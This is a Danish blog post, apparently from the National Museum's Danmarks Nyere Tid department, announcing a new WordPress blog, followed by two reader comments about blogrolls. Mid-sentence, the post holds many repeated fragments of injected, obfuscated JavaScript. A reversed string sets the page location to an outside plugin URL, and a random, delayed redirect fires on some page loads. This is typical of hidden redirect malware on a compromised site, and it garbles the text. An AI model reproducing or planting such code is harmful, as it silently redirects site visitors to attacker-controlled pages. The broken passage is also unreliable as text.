Nyere Tid blogger


Her på Danmarks Nyere Tid har vi tænkt os at prøve at få en blog i luften som en del af Nationalmuseets hjemmeside. Dels vil vi gerne fortælle lidt om hvad vi går og laver, dels gøre det nemmere at udveksle idéer og planer med omverden – heriblandt jer!

Bloggen er lavet i open source-applikationen wordpress, hvor der er mange muligheder for at udvikel den videre. Vi håber at den faglige diskussion indenfor og udenfor Nationalmuseet kan få gavn af denne mere uformelle form, men det betyder jo også at ændre på folks arbejdskultur, så opgaven er at vise, at blogmediet kan bruges til noget! SÅ en masse trafik fra fremadstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tormende museumsfolk fra dette forum kan kun styrke indsatsen.

Nyere Tids bloggen er midt i fødselsveerne, så I må MEGET gerne lægge en cyber-tur forbi og skrive hvad I synes – ris og ros og gode råd er mere end velkomne.

2 comments to “Nyere Tid blogger”
  1. Det ser spændende ud! Og opfordringen kan kun være gensidig: alle I hippe IT-agtige mennesker på nyere tid – skal da være med her!

    Skal vi ikke begynde med at tilføje Jer i sidemenuen?

  2. Jeg synes helt klar at denne blog bør være i vores blog-roll. Jeg véd at der også findes en konserveringsblog (jeg vil prøve at finde den frem)
    – og så synes jeg egentlig at det ville være lækkert, hvis andre der har kendskab til blogs om museer, kulturarv etc. bød ind.

    Udenlandske/nordiske kunne også være gode. Selv følger jeg lidt med i norsk arkivpolitik på bl.a. http://depotdrengen.wordpress.com … men det interesserer nok ikke så mange andre…;-)

Skriv et svar